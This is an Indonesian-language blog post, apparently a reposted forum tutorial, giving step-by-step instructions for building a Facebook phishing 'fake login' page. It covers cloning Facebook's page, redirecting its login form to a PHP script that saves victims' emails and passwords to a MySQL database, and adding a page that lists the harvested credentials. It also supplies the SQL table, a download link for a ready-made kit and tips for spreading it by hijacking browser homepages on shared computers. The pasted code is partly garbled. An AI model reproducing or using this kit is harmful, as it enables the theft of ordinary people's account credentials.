Langkah-langkah Membuat Fake login

maaf kalau repost,,,

Yeah,,, mungkin udah ngga jaman kali yee,,, tapi sekedar sharing aja,, heehhehehehe,,, Capek

yang udah tau mending ngga usah deh buat baca nich tread,,, supaya agan-agan yang udah tau ngga bakal rugi-rugiin waktunye cuman buat baca nich tutor si newbie,,, hehehehehe,,, Ngakak

disini saya akan menjelaskan bagaimana caranya untuk membuat fakelogin,, tapi kali ini email sama passnya ngga masuk ke .txt yang chmod 777 itu,,, tapi akan di masukan ke database,, dan akan ditampilin dengan menggunakan file .php

oke dari pade banyak omong biking saya pegel nulis kita langsung aja ye,,,

Untuk langkah pertamanya agan-agan cari target dulu yang mau di jadiin tumbal tuk fakeloginnya,,, cari target yang sering digunakan oleh pengguna internet,, saya ambil contoh http://www.facebook.com

oke,, pada halaman facebook klik kanan mouse trus pilih "save page as",,, pada "save as type" pilih "all files" dan untuk "file name" ketikan "index.php".

kenapa saya pilih "Save page as" dan disimpan dengan ekstensi ".php" karena sesuai dengan pengalaman saya waktu nyoba-nyoba, kalau di alihkan ke ".htm" kayaknya berat banget filenya kalau mau di upload ke hosting,,, trus kalau kita pake yang "view ==>> page source" kayaknya pada bagian terjemahan bahasa yang letaknya berada paling bawah halaman facebook itu bakal jadi "???" maksud tulisannya ngga bakal tertata dengan rapi,,

GHITU LOHHHH...... :geje:

oke,, kalau sudah,, buka file index.php yang tadinya sudah di buat dengan notepad,

setelah itu pada keyboard tahan "ctrl" lalu klik "F" untuk mencari script yang bakal kita rubah,, pada kolom pencarian masukkan kata "action" lalu enter,,, oke pada kata action kita bakal menemukan script seperti ini


Code:
action="https://login.facebook.com/login.php?login_attempt=1"


nah ganti "https://login.facebook.com/login.php?login_attempt=1" dengan "masuk .php" jadi sriptnya bakal kayak gini

Code:
action="masuk.php"


save file...

nah,, kalau sudah kita lanjut ke langkah berikutnya,,,

Selanjutnya kita buat file untuk mengirimkan email dan password korban ke database,, simpan script berikut dengan nama "masuk.php"

PHP Code:
//ini untuk melakukan koneksi ke databaseinclude 'config.php';
include 
'opendb.php';
$email=$_REQUEST['email'];$pass=$_REQUEST['pass'];
//membuat Query untuk menyimpan data$sql="INSERT INTO hasil (email, pass) values ('$email','$pass')";
//menyimpan data ke databasemysql_query($sql);
echo 
" ";?>

Save file...

dari script diatas kita bisa lihat ada perintah untuk meng include "include 'config.php'; dan include 'opendb.php';" ini fungsinya untuk mengoneksikan file "masuk.php" dengan database kita,, untuk membuatnya silahkan agan buat script berikut dengan nama "config.php"

PHP Code:
$dbhost 'localhost'//ganti dengan localhost database yang dibuat$dbuser 'root'//ganti dengan database user yang dibuat$dbpass 'password'//ganti dengan password database yang dibuat$dbname 'root'//ganti dengan database name yang dibuat?>

Save file...

trus buat lagi script berikut dengan nama "opendb.php"

PHP Code:
// This is an example opendb.php$conn mysql_connect($dbhost$dbuser$dbpass) or die                      ('WekzzZZz,,, Error connecting to mysql,, huhuhuuh');mysql_select_db($dbname);?>

Save file...

oke langkah selanjutnya kita buat file .php untuk menampilkan email dan password korban fakelogin yang ada di database kita,,, simpan script berikut dengan nama "hasil.php"

PHP Code:
//ini untuk jumlah hasil fakelogin yang pingin ditampilkan
    
$jml 100;

include 
'config.php';
include 
'opendb.php';

if(!
$conn)
{
    echo 
'Can\'t find database, maybe server down .....';
    exit;
}

else
{
echo 
'
    ';$sx mysql_query("SELECT * FROM hasil ORDER BY RAND() LIMIT $jml");$no 1; while($x=mysql_fetch_array($sx)) {     echo '
  1. email : '
  2. .$x[email].' ';     echo 'kata sandi : '.$x[pass].'';     echo'';     $no++; } echo '
'
;
}
?>

Save file...

nahhh kalau sudah,, langkah terakhir kita buat table ke database untuk menyimpan email sama password korban,,

PHP Code:
CREATE TABLE `hasil` (
  `
emailvarchar(50collate latin1_general_ci NOT NULL default '',
  `
passvarchar(50collate latin1_general_ci default NULL

setelah selesai kita persiapkan semuanya,,, yeah tinggal di upload aja ke hosting agan-agan sekalian,,, dan lihat hasilnya,,,

heheheheee,, maaf sebelumnya kalau posting saya agak berantakan,, dan ngga lengkap-lengkap amat,,, coz waktu nulis tutor ini kepala saya lagi puyeng mikirin bantal,,, alias ngantuk,,, Mumet hehehehhe,,,Capek

jadi mohon maaf yeahhh,,, kalau ada yang ngga jelas nanti di tanyain aja,, Insya Allah nanti di jawab,,, dan untuk para master mohon koreksinya kalau ada script-script saya yang salah,,, atau kalau ada tambahan bisa langsung aja kita bicarakan pada tread ini,,, terima kasih,,,

Untuk agan-agan yang ngga pingin basa-basi untuk buat filenya,,, agan-agan bisa pake yang saya sudah buat sebelumnya

Code:
http://www.4shared.com/file/atGCf4q6/fakelogin.html

Untuk contoh fakeloginnya bisa langsung dilihat disini

dan untuk melihat syapa aja yang udah terjaring fakelogin ini bisa langsung ke sini aja

Code:
http://id-id-facebook.tk/hasil

Catatan:
Cara menyebarkan fakelogin ini tergantung dari kreatifitas agan-agan sendiri,,,

contoh : untuk pengguna mozilla
pada halaman kanan atas pilih "Tools" kemudian "Options" pilih "general" pada "Home page" ganti URLnya dengan URL fakelogin agan yang sudah dibuat,, kalau kompinya pake DF,, yeah tinggal bobol aja DF nya,, banyak kan tread nya di HN yang membicarakan tentang bobol DF,,, jadi happy Enjoy aja,,,
Komentar →
Comments
0 Comments

0 comments:

Poskan Komentar

komentar anda sangat penting utk kemajuan blog ini.trimakasih utk kunjungannya...

◄ Posting Baru Posting Lama ►
 

tourist n stats

W3 Directory - the World Wide Web Directory My Ping in TotalPing.com
Google PageRank Checker Powered by  MyPagerank.Net

guest room

Copyright © 2012. CYBER MANADO - All Rights Reserved B-Seo Versi 3 by Bamz